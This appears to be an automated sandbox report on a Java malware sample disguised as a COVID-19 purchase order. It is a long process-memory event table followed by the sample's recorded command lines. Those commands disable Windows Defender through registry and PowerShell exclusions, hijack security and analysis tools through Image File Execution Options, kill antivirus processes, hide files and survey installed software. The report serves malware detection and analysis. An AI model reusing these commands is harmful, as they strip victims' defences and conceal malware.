PID 908 wrote to memory of 3948	908	java.exe	168
PID 3948 wrote to memory of 936	3948	cmd.exe	170
PID 3948 wrote to memory of 936	3948	cmd.exe	170
PID 3948 wrote to memory of 2176	3948	cmd.exe	171
PID 3948 wrote to memory of 2176	3948	cmd.exe	171
PID 908 wrote to memory of 2500	908	java.exe	173
PID 908 wrote to memory of 2500	908	java.exe	173
PID 2500 wrote to memory of 2988	2500	cmd.exe	175
PID 2500 wrote to memory of 2988	2500	cmd.exe	175
PID 908 wrote to memory of 4116	908	java.exe	176
PID 908 wrote to memory of 4116	908	java.exe	176
PID 2500 wrote to memory of 4124	2500	cmd.exe	177
PID 2500 wrote to memory of 4124	2500	cmd.exe	177
PID 908 wrote to memory of 4240	908	java.exe	180
PID 908 wrote to memory of 4240	908	java.exe	180
PID 4240 wrote to memory of 4276	4240	cmd.exe	182
PID 4240 wrote to memory of 4276	4240	cmd.exe	182
PID 4240 wrote to memory of 4300	4240	cmd.exe	183
PID 4240 wrote to memory of 4300	4240	cmd.exe	183
PID 908 wrote to memory of 4320	908	java.exe	184
PID 908 wrote to memory of 4320	908	java.exe	184
PID 4320 wrote to memory of 4360	4320	cmd.exe	186
PID 4320 wrote to memory of 4360	4320	cmd.exe	186
PID 4320 wrote to memory of 4376	4320	cmd.exe	187
PID 4320 wrote to memory of 4376	4320	cmd.exe	187
PID 908 wrote to memory of 4392	908	java.exe	188
PID 908 wrote to memory of 4392	908	java.exe	188
PID 4392 wrote to memory of 4428	4392	cmd.exe	190
PID 4392 wrote to memory of 4428	4392	cmd.exe	190
PID 4392 wrote to memory of 4448	4392	cmd.exe	191
PID 4392 wrote to memory of 4448	4392	cmd.exe	191
PID 908 wrote to memory of 4468	908	java.exe	192
PID 908 wrote to memory of 4468	908	java.exe	192
PID 908 wrote to memory of 4516	908	java.exe	194
PID 908 wrote to memory of 4516	908	java.exe	194
PID 4468 wrote to memory of 4536	4468	cmd.exe	196
PID 4468 wrote to memory of 4536	4468	cmd.exe	196
PID 4468 wrote to memory of 4564	4468	cmd.exe	197
PID 4468 wrote to memory of 4564	4468	cmd.exe	197
PID 908 wrote to memory of 4588	908	java.exe	198
PID 908 wrote to memory of 4588	908	java.exe	198
PID 4588 wrote to memory of 4644	4588	cmd.exe	200
PID 4588 wrote to memory of 4644	4588	cmd.exe	200
PID 4588 wrote to memory of 4664	4588	cmd.exe	201
PID 4588 wrote to memory of 4664	4588	cmd.exe	201
PID 908 wrote to memory of 4680	908	java.exe	202
PID 908 wrote to memory of 4680	908	java.exe	202
PID 4680 wrote to memory of 4716	4680	cmd.exe	204
PID 4680 wrote to memory of 4716	4680	cmd.exe	204
PID 4680 wrote to memory of 4736	4680	cmd.exe	205
PID 4680 wrote to memory of 4736	4680	cmd.exe	205
PID 908 wrote to memory of 4756	908	java.exe	206
PID 908 wrote to memory of 4756	908	java.exe	206
PID 4756 wrote to memory of 4792	4756	cmd.exe	208
PID 4756 wrote to memory of 4792	4756	cmd.exe	208
PID 4756 wrote to memory of 4812	4756	cmd.exe	209
PID 4756 wrote to memory of 4812	4756	cmd.exe	209
PID 908 wrote to memory of 4832	908	java.exe	210
PID 908 wrote to memory of 4832	908	java.exe	210
PID 4832 wrote to memory of 4868	4832	cmd.exe	212
PID 4832 wrote to memory of 4868	4832	cmd.exe	212
PID 4832 wrote to memory of 4888	4832	cmd.exe	213
PID 4832 wrote to memory of 4888	4832	cmd.exe	213
PID 908 wrote to memory of 4908	908	java.exe	214
PID 908 wrote to memory of 4908	908	java.exe	214
PID 4908 wrote to memory of 4944	4908	cmd.exe	216
PID 4908 wrote to memory of 4944	4908	cmd.exe	216
PID 4908 wrote to memory of 4964	4908	cmd.exe	217
PID 4908 wrote to memory of 4964	4908	cmd.exe	217
PID 908 wrote to memory of 4984	908	java.exe	218
PID 908 wrote to memory of 4984	908	java.exe	218
PID 4984 wrote to memory of 5020	4984	cmd.exe	220
PID 4984 wrote to memory of 5020	4984	cmd.exe	220
PID 4984 wrote to memory of 5040	4984	cmd.exe	221
PID 4984 wrote to memory of 5040	4984	cmd.exe	221
PID 908 wrote to memory of 5056	908	java.exe	222
PID 908 wrote to memory of 5056	908	java.exe	222
PID 908 wrote to memory of 5076	908	java.exe	224
PID 908 wrote to memory of 5076	908	java.exe	224
PID 5076 wrote to memory of 4128	5076	cmd.exe	226
PID 5076 wrote to memory of 4128	5076	cmd.exe	226
PID 5076 wrote to memory of 4256	5076	cmd.exe	227
PID 5076 wrote to memory of 4256	5076	cmd.exe	227
PID 908 wrote to memory of 4308	908	java.exe	228
PID 908 wrote to memory of 4308	908	java.exe	228
PID 4308 wrote to memory of 4224	4308	cmd.exe	230
PID 4308 wrote to memory of 4224	4308	cmd.exe	230
PID 4308 wrote to memory of 4164	4308	cmd.exe	231
PID 4308 wrote to memory of 4164	4308	cmd.exe	231
PID 908 wrote to memory of 4328	908	java.exe	232
PID 908 wrote to memory of 4328	908	java.exe	232
PID 4328 wrote to memory of 4376	4328	cmd.exe	234
PID 4328 wrote to memory of 4376	4328	cmd.exe	234
PID 908 wrote to memory of 3600	908	java.exe	235
PID 908 wrote to memory of 3600	908	java.exe	235
PID 4328 wrote to memory of 1596	4328	cmd.exe	237
PID 4328 wrote to memory of 1596	4328	cmd.exe	237
PID 908 wrote to memory of 4428	908	java.exe	238
PID 908 wrote to memory of 4428	908	java.exe	238
PID 4428 wrote to memory of 3564	4428	cmd.exe	240
PID 4428 wrote to memory of 3564	4428	cmd.exe	240
PID 4428 wrote to memory of 3772	4428	cmd.exe	241
PID 4428 wrote to memory of 3772	4428	cmd.exe	241
PID 908 wrote to memory of 744	908	java.exe	242
PID 908 wrote to memory of 744	908	java.exe	242
PID 744 wrote to memory of 3152	744	cmd.exe	244
PID 744 wrote to memory of 3152	744	cmd.exe	244
PID 744 wrote to memory of 3192	744	cmd.exe	245
PID 744 wrote to memory of 3192	744	cmd.exe	245
PID 908 wrote to memory of 4532	908	java.exe	246
PID 908 wrote to memory of 4532	908	java.exe	246
PID 4532 wrote to memory of 4604	4532	cmd.exe	248
PID 4532 wrote to memory of 4604	4532	cmd.exe	248
PID 4532 wrote to memory of 4656	4532	cmd.exe	249
PID 4532 wrote to memory of 4656	4532	cmd.exe	249
PID 908 wrote to memory of 4664	908	java.exe	250
PID 908 wrote to memory of 4664	908	java.exe	250
PID 4664 wrote to memory of 4516	4664	cmd.exe	252
PID 4664 wrote to memory of 4516	4664	cmd.exe	252
PID 4664 wrote to memory of 4688	4664	cmd.exe	253
PID 4664 wrote to memory of 4688	4664	cmd.exe	253
PID 908 wrote to memory of 4732	908	java.exe	254
PID 908 wrote to memory of 4732	908	java.exe	254
PID 4732 wrote to memory of 4764	4732	cmd.exe	256
PID 4732 wrote to memory of 4764	4732	cmd.exe	256
PID 4732 wrote to memory of 4796	4732	cmd.exe	257
PID 4732 wrote to memory of 4796	4732	cmd.exe	257
PID 908 wrote to memory of 4824	908	java.exe	258
PID 908 wrote to memory of 4824	908	java.exe	258
PID 4824 wrote to memory of 4868	4824	cmd.exe	260
PID 4824 wrote to memory of 4868	4824	cmd.exe	260
PID 4824 wrote to memory of 4916	4824	cmd.exe	261
PID 4824 wrote to memory of 4916	4824	cmd.exe	261
PID 908 wrote to memory of 4956	908	java.exe	262
PID 908 wrote to memory of 4956	908	java.exe	262
PID 4956 wrote to memory of 5028	4956	cmd.exe	264
PID 4956 wrote to memory of 5028	4956	cmd.exe	264
PID 4956 wrote to memory of 5020	4956	cmd.exe	265
PID 4956 wrote to memory of 5020	4956	cmd.exe	265
PID 908 wrote to memory of 5064	908	java.exe	266
PID 908 wrote to memory of 5064	908	java.exe	266
PID 5064 wrote to memory of 4280	5064	cmd.exe	268
PID 5064 wrote to memory of 4280	5064	cmd.exe	268
PID 5064 wrote to memory of 4136	5064	cmd.exe	269
PID 5064 wrote to memory of 4136	5064	cmd.exe	269
PID 908 wrote to memory of 4128	908	java.exe	270
PID 908 wrote to memory of 4128	908	java.exe	270
PID 4128 wrote to memory of 4228	4128	cmd.exe	272
PID 4128 wrote to memory of 4228	4128	cmd.exe	272
PID 908 wrote to memory of 4224	908	java.exe	273
PID 908 wrote to memory of 4224	908	java.exe	273
PID 4128 wrote to memory of 4368	4128	cmd.exe	275
PID 4128 wrote to memory of 4368	4128	cmd.exe	275
PID 908 wrote to memory of 4020	908	java.exe	276
PID 908 wrote to memory of 4020	908	java.exe	276
PID 4020 wrote to memory of 3916	4020	cmd.exe	278
PID 4020 wrote to memory of 3916	4020	cmd.exe	278
PID 4020 wrote to memory of 2180	4020	cmd.exe	279
PID 4020 wrote to memory of 2180	4020	cmd.exe	279
PID 908 wrote to memory of 3488	908	java.exe	280
PID 908 wrote to memory of 3488	908	java.exe	280
PID 3488 wrote to memory of 1492	3488	cmd.exe	282
PID 3488 wrote to memory of 1492	3488	cmd.exe	282
PID 3488 wrote to memory of 4276	3488	cmd.exe	283
PID 3488 wrote to memory of 4276	3488	cmd.exe	283
PID 908 wrote to memory of 4708	908	java.exe	284
PID 908 wrote to memory of 4708	908	java.exe	284
PID 4708 wrote to memory of 4348	4708	cmd.exe	286
PID 4708 wrote to memory of 4348	4708	cmd.exe	286
PID 4708 wrote to memory of 3464	4708	cmd.exe	287
PID 4708 wrote to memory of 3464	4708	cmd.exe	287
PID 908 wrote to memory of 2232	908	java.exe	288
PID 908 wrote to memory of 2232	908	java.exe	288
PID 2232 wrote to memory of 3968	2232	cmd.exe	290
PID 2232 wrote to memory of 3968	2232	cmd.exe	290
PID 2232 wrote to memory of 4588	2232	cmd.exe	291
PID 2232 wrote to memory of 4588	2232	cmd.exe	291
PID 908 wrote to memory of 4496	908	java.exe	292
PID 908 wrote to memory of 4496	908	java.exe	292
PID 4496 wrote to memory of 1928	4496	cmd.exe	294
PID 4496 wrote to memory of 1928	4496	cmd.exe	294
PID 4496 wrote to memory of 5076	4496	cmd.exe	295
PID 4496 wrote to memory of 5076	4496	cmd.exe	295
PID 908 wrote to memory of 4780	908	java.exe	296
PID 908 wrote to memory of 4780	908	java.exe	296
PID 4780 wrote to memory of 4264	4780	cmd.exe	298
PID 4780 wrote to memory of 4264	4780	cmd.exe	298
PID 4780 wrote to memory of 4252	4780	cmd.exe	299
PID 4780 wrote to memory of 4252	4780	cmd.exe	299
PID 908 wrote to memory of 3756	908	java.exe	300
PID 908 wrote to memory of 3756	908	java.exe	300
PID 3756 wrote to memory of 3936	3756	cmd.exe	302
PID 3756 wrote to memory of 3936	3756	cmd.exe	302
PID 3756 wrote to memory of 5100	3756	cmd.exe	303
PID 3756 wrote to memory of 5100	3756	cmd.exe	303
PID 908 wrote to memory of 3480	908	java.exe	304
PID 908 wrote to memory of 3480	908	java.exe	304
PID 3480 wrote to memory of 4860	3480	cmd.exe	306
PID 3480 wrote to memory of 4860	3480	cmd.exe	306
PID 3480 wrote to memory of 1012	3480	cmd.exe	307
PID 3480 wrote to memory of 1012	3480	cmd.exe	307
PID 908 wrote to memory of 1848	908	java.exe	308
PID 908 wrote to memory of 1848	908	java.exe	308
PID 1848 wrote to memory of 1888	1848	cmd.exe	310
PID 1848 wrote to memory of 1888	1848	cmd.exe	310
PID 1848 wrote to memory of 1220	1848	cmd.exe	311
PID 1848 wrote to memory of 1220	1848	cmd.exe	311
PID 908 wrote to memory of 640	908	java.exe	312
PID 908 wrote to memory of 640	908	java.exe	312
PID 640 wrote to memory of 4440	640	cmd.exe	314
PID 640 wrote to memory of 4440	640	cmd.exe	314
PID 640 wrote to memory of 2128	640	cmd.exe	315
PID 640 wrote to memory of 2128	640	cmd.exe	315
PID 908 wrote to memory of 2112	908	java.exe	316
PID 908 wrote to memory of 2112	908	java.exe	316
PID 2112 wrote to memory of 1264	2112	cmd.exe	318
PID 2112 wrote to memory of 1264	2112	cmd.exe	318
PID 2112 wrote to memory of 2980	2112	cmd.exe	319
PID 2112 wrote to memory of 2980	2112	cmd.exe	319
PID 908 wrote to memory of 3904	908	java.exe	320
PID 908 wrote to memory of 3904	908	java.exe	320
PID 3904 wrote to memory of 4596	3904	cmd.exe	322
PID 3904 wrote to memory of 4596	3904	cmd.exe	322
PID 3904 wrote to memory of 4644	3904	cmd.exe	323
PID 3904 wrote to memory of 4644	3904	cmd.exe	323
PID 908 wrote to memory of 4552	908	java.exe	324
PID 908 wrote to memory of 4552	908	java.exe	324
PID 4552 wrote to memory of 4724	4552	cmd.exe	326
PID 4552 wrote to memory of 4724	4552	cmd.exe	326
PID 4552 wrote to memory of 4772	4552	cmd.exe	327
PID 4552 wrote to memory of 4772	4552	cmd.exe	327
PID 908 wrote to memory of 4820	908	java.exe	328
PID 908 wrote to memory of 4820	908	java.exe	328
PID 908 wrote to memory of 4904	908	java.exe	330
PID 908 wrote to memory of 4904	908	java.exe	330
PID 4820 wrote to memory of 5036	4820	cmd.exe	332
PID 4820 wrote to memory of 5036	4820	cmd.exe	332
PID 4820 wrote to memory of 5044	4820	cmd.exe	333
PID 4820 wrote to memory of 5044	4820	cmd.exe	333
PID 908 wrote to memory of 4104	908	java.exe	334
PID 908 wrote to memory of 4104	908	java.exe	334
PID 4104 wrote to memory of 4116	4104	cmd.exe	336
PID 4104 wrote to memory of 4116	4104	cmd.exe	336
PID 4104 wrote to memory of 4228	4104	cmd.exe	337
PID 4104 wrote to memory of 4228	4104	cmd.exe	337
PID 908 wrote to memory of 1952	908	java.exe	338
PID 908 wrote to memory of 1952	908	java.exe	338
PID 1952 wrote to memory of 1992	1952	cmd.exe	340
PID 1952 wrote to memory of 1992	1952	cmd.exe	340
PID 1952 wrote to memory of 732	1952	cmd.exe	341
PID 1952 wrote to memory of 732	1952	cmd.exe	341
PID 908 wrote to memory of 556	908	java.exe	342
PID 908 wrote to memory of 556	908	java.exe	342
PID 556 wrote to memory of 2524	556	cmd.exe	344
PID 556 wrote to memory of 2524	556	cmd.exe	344
PID 556 wrote to memory of 1492	556	cmd.exe	345
PID 556 wrote to memory of 1492	556	cmd.exe	345
PID 908 wrote to memory of 4624	908	java.exe	346
PID 908 wrote to memory of 4624	908	java.exe	346
PID 4624 wrote to memory of 3876	4624	cmd.exe	348
PID 4624 wrote to memory of 3876	4624	cmd.exe	348
PID 4624 wrote to memory of 1016	4624	cmd.exe	349
PID 4624 wrote to memory of 1016	4624	cmd.exe	349
PID 908 wrote to memory of 3968	908	java.exe	350
PID 908 wrote to memory of 3968	908	java.exe	350
PID 908 wrote to memory of 2072	908	java.exe	352
PID 908 wrote to memory of 2072	908	java.exe	352
PID 908 wrote to memory of 412	908	java.exe	354
PID 908 wrote to memory of 412	908	java.exe	354
PID 908 wrote to memory of 4860	908	java.exe	356
PID 908 wrote to memory of 4860	908	java.exe	356
PID 908 wrote to memory of 2196	908	java.exe	358
PID 908 wrote to memory of 2196	908	java.exe	358
PID 908 wrote to memory of 2120	908	java.exe	360
PID 908 wrote to memory of 2120	908	java.exe	360
PID 908 wrote to memory of 4604	908	java.exe	362
PID 908 wrote to memory of 4604	908	java.exe	362

Loads dropped DLL 1 IoCs

pid	Process
908	java.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\PO For-COVID-19 Products.jar"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Adds Run entry to start application
- Suspicious use of SetWindowsHookEx
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
PID:908
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3480
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3900
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3904
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3572
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3864
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:4020
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:732
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\rMnZL\Desktop.ini
  2⤵
  - Views/modifies file attributes
  - Drops desktop.ini file(s)
  PID:2768
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\rMnZL\Desktop.ini
  2⤵
  - Views/modifies file attributes
  - Drops desktop.ini file(s)
  PID:512
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\rMnZL
  2⤵
  - Views/modifies file attributes
  PID:2216
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\rMnZL
  2⤵
  - Views/modifies file attributes
  PID:3940
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\rMnZL
  2⤵
  - Views/modifies file attributes
  PID:3736
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\rMnZL\Suteu.class
  2⤵
  - Views/modifies file attributes
  PID:1952
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2820
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1740
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\rMnZL','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\rMnZL\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3952
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:3984
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4024
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:636
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:4008
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:4044
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1532
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2860
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2052
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3036
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3168
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2196
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2036
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3084
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1532
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2224
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2128
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:944
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3600
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1992
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2848
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3784
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:3592
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:2036
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2500
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:416
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2848
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3920
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:3416
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1784
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:2036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:2196
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2836
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
    3⤵
    PID:3688
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1288
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:944
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:2500
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:936
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:2176
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2500
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:2988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:4124
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4116
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4240
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:4276
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:4300
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4320
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:4360
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:4376
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4392
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:4428
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:4448
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4468
